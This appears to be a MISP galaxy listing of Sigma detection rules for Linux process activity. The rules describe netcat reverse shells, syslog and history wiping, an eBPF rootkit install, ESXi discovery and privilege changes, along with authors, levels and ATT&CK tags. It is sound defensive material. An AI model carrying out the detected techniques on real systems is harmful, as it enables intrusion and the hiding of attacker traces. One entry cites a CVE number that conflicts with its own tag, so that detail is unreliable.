Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services

Internal MISP references

UUID de25eeb8-3655-4643-ac3a-b662d3f26b6b which can be used as unique global reference for Disable Or Stop Services in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_services_stop_and_disable.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion']

ESXi VM List Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

Internal MISP references

UUID 5f1573a7-363b-4114-9208-ad7a61de46eb which can be used as unique global reference for ESXi VM List Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vm_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Commands to Clear or Remove the Syslog

Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks

Internal MISP references

UUID 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 which can be used as unique global reference for Commands to Clear or Remove the Syslog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Log rotation.']
filename proc_creation_lnx_clear_syslog.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.002']
Related clusters

To see the related clusters, click here.

ESXi Storage Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

Internal MISP references

UUID f41dada5-3f56-4232-8503-3fb7f9cf2d60 which can be used as unique global reference for ESXi Storage Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_storage_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

ESXi Network Configuration Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

Internal MISP references

UUID 33e814e0-1f00-4e43-9c34-31fb7ae2b174 which can be used as unique global reference for ESXi Network Configuration Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_network_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Suspicious Java Children Processes

Detects java process spawning suspicious children

Internal MISP references

UUID d292e0af-9a18-420c-9525-ec0ac3936892 which can be used as unique global reference for Suspicious Java Children Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_susp_java_children.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Container Discovery Via Inodes Listing

Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.

Internal MISP references

UUID 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 which can be used as unique global reference for Potential Container Discovery Via Inodes Listing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_inod_listing.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Process Discovery

Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network

Internal MISP references

UUID 4e2f5868-08d4-413d-899f-dc2f1508627b which can be used as unique global reference for Process Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_process_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1057']
Related clusters

To see the related clusters, click here.

Remove Immutable File Attribute

Detects usage of the 'chattr' utility to remove immutable file attribute.

Internal MISP references

UUID 34979410-e4b5-4e5d-8cfb-389fdff05c12 which can be used as unique global reference for Remove Immutable File Attribute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Administrator interacting with immutable files (e.g. for instance backups).']
filename proc_creation_lnx_chattr_immutable_removal.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Potential Suspicious Change To Sensitive/Critical Files

Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.

Internal MISP references

UUID 86157017-c2b1-4d4a-8c33-93b8e67e4af4 which can be used as unique global reference for Potential Suspicious Change To Sensitive/Critical Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_ (Wuerth-Phoenix)
creation_date 2023/05/30
falsepositive ['Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.']
filename proc_creation_lnx_susp_sensitive_file_access.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

OMIGOD SCX RunAsProvider ExecuteShellCommand

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 21541900-27a9-4454-9c4c-3f0a4240344a which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteShellCommand in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.']
filename proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Potential Netcat Reverse Shell Execution

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

Internal MISP references

UUID 7f734ed0-4f47-46c0-837f-6ee62505abd9 which can be used as unique global reference for Potential Netcat Reverse Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/07
falsepositive ['Unlikely']
filename proc_creation_lnx_netcat_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Nohup Execution

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

Internal MISP references

UUID e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 which can be used as unique global reference for Nohup Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/06
falsepositive ['Administrators or installed processes that leverage nohup']
filename proc_creation_lnx_nohup.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Install Root Certificate

Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

Internal MISP references

UUID 78a80655-a51e-4669-bc6b-e9d206a462ee which can be used as unique global reference for Install Root Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/05
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_install_root_certificate.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Remove Scheduled Cron Task/Job

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible

Internal MISP references

UUID c2e234de-03a3-41e1-b39a-1e56dc17ba67 which can be used as unique global reference for Remove Scheduled Cron Task/Job in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Unknown']
filename proc_creation_lnx_crontab_removal.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion']

Potentially Suspicious Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location

Internal MISP references

UUID 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a which can be used as unique global reference for Potentially Suspicious Named Pipe Created Via Mkfifo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/16
falsepositive ['Unknown']
filename proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Connection Proxy

Detects setting proxy configuration

Internal MISP references

UUID 72f4ab3f-787d-495d-a55d-68c2ff46cf4c which can be used as unique global reference for Connection Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_proxy_connection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1090']
Related clusters

To see the related clusters, click here.

ESXi VSAN Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

Internal MISP references

UUID d54c2f06-aca9-4e2b-81c9-5317858f4b79 which can be used as unique global reference for ESXi VSAN Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vsan_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Docker Container Discovery Via Dockerenv Listing

Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery

Internal MISP references

UUID 11701de9-d5a5-44aa-8238-84252f131895 which can be used as unique global reference for Docker Container Discovery Via Dockerenv Listing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_dockerenv_recon.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

ESXi Account Creation Via ESXCLI

Detects user account creation on ESXi system via esxcli

Internal MISP references

UUID b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db which can be used as unique global reference for ESXi Account Creation Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/08/22
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_user_account_creation.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1136']
Related clusters

To see the related clusters, click here.

Enable BPF Kprobes Tracing

Detects common command used to enable bpf kprobes tracing

Internal MISP references

UUID 7692f583-bd30-4008-8615-75dab3f08a99 which can be used as unique global reference for Enable BPF Kprobes Tracing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/25
falsepositive ['Unknown']
filename proc_creation_lnx_bpf_kprob_tracing_enabled.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.defense_evasion']

File Deletion

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

Internal MISP references

UUID 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 which can be used as unique global reference for File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_file_deletion.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Potential Linux Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

Internal MISP references

UUID f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 which can be used as unique global reference for Potential Linux Amazon SSM Agent Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal
creation_date 2023/08/03
falsepositive ['Legitimate activity of system administrators']
filename proc_creation_lnx_ssm_agent_abuse.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.persistence', 'attack.t1219']
Related clusters

To see the related clusters, click here.

ESXi Admin Permission Assigned To Account Via ESXCLI

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

Internal MISP references

UUID 9691f58d-92c1-4416-8bf3-2edd753ec9cf which can be used as unique global reference for ESXi Admin Permission Assigned To Account Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_permission_change_admin.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Container Residence Discovery Via Proc Virtual FS

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

Internal MISP references

UUID 746c86fb-ccda-4816-8997-01386263acc4 which can be used as unique global reference for Container Residence Discovery Via Proc Virtual FS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Seth Hanford
creation_date 2023/08/23
falsepositive ['Legitimate system administrator usage of these commands', 'Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered']
filename proc_creation_lnx_susp_container_residence_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Mount Execution With Hidepid Parameter

Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system

Internal MISP references

UUID ec52985a-d024-41e3-8ff6-14169039a0b3 which can be used as unique global reference for Mount Execution With Hidepid Parameter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/12
falsepositive ['Unknown']
filename proc_creation_lnx_mount_hidepid.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.credential_access', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Team Viewer Session Started On Linux Host

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Download File To Potentially Suspicious Directory Via Wget

Detects the use of wget to download content to a suspicious directory

Internal MISP references

UUID cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 which can be used as unique global reference for Download File To Potentially Suspicious Directory Via Wget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_wget_download_suspicious_directory.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Linux Doas Tool Execution

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

Internal MISP references

UUID 067d8238-7127-451c-a9ec-fa78045b618b which can be used as unique global reference for Linux Doas Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Teoderick Contreras
creation_date 2022/01/20
falsepositive ['Unlikely']
filename proc_creation_lnx_doas_execution.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

History File Deletion

Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity

Internal MISP references

UUID 1182f3b3-e716-4efa-99ab-d2685d04360f which can be used as unique global reference for History File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_history_delete.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Cat Sudoers

Detects the execution of a cat /etc/sudoers to list all users that have sudo rights

Internal MISP references

UUID 0f79c4d2-4e1f-4683-9c36-b5469a665e06 which can be used as unique global reference for Cat Sudoers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_cat_sudoers.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004']
Related clusters

To see the related clusters, click here.

Suspicious Git Clone - Linux

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

Internal MISP references

UUID cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 which can be used as unique global reference for Suspicious Git Clone - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Unknown']
filename proc_creation_lnx_susp_git_clone.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1593.003']
Related clusters

To see the related clusters, click here.

Pnscan Binary Data Transmission Activity

Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT

Internal MISP references

UUID 97de11cd-4b67-4abf-9a8b-1020e670aa9e which can be used as unique global reference for Pnscan Binary Data Transmission Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett (@signalblur)
creation_date 2024/04/16
falsepositive ['Unknown']
filename proc_creation_lnx_pnscan_binary_cli_pattern.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Setuid and Setgid

Detects suspicious change of file privileges with chown and chmod commands

Internal MISP references

UUID c21c4eaa-ba2e-419a-92b2-8371703cbe21 which can be used as unique global reference for Setuid and Setgid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/16
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_setgid_setuid.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1548.001']
Related clusters

To see the related clusters, click here.

Apache Spark Shell Command Injection - ProcessCreation

Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective

Internal MISP references

UUID c8a5f584-cdc8-42cc-8cce-0398e4265de3 which can be used as unique global reference for Apache Spark Shell Command Injection - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/20
falsepositive ['Unlikely']
filename proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.t1190', 'cve.2022.33891']
Related clusters

To see the related clusters, click here.

Potential GobRAT File Discovery Via Grep

Detects the use of grep to discover specific files created by the GobRAT malware

Internal MISP references

UUID e34cfa0c-0a50-4210-9cb3-5632d08eb041 which can be used as unique global reference for Potential GobRAT File Discovery Via Grep in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution From Tmp Folder

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

Internal MISP references

UUID 312b42b1-bded-4441-8b58-163a3af58775 which can be used as unique global reference for Potentially Suspicious Execution From Tmp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_execution_tmp_folder.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Local Groups Discovery - Linux

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

Internal MISP references

UUID 676381a6-15ca-4d73-a9c8-6a22e970b90d which can be used as unique global reference for Local Groups Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_local_groups.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

User Added To Root/Sudoers Group Using Usermod

Detects usage of the "usermod" binary to add users add users to the root or suoders groups

Internal MISP references

UUID 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 which can be used as unique global reference for User Added To Root/Sudoers Group Using Usermod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TuanLe (GTSC)
creation_date 2022/12/21
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_usermod_susp_group.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.persistence']

Triple Cross eBPF Rootkit Install Commands

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script

Internal MISP references

UUID 22236d75-d5a0-4287-bf06-c93b1770860f which can be used as unique global reference for Triple Cross eBPF Rootkit Install Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename proc_creation_lnx_triple_cross_rootkit_install.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1014']
Related clusters

To see the related clusters, click here.

Security Software Discovery - Linux

Detects usage of system utilities (only grep and egrep for now) to discover security software discovery

Internal MISP references

UUID c9d8b7fd-78e4-44fe-88f6-599135d46d60 which can be used as unique global reference for Security Software Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_security_software_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.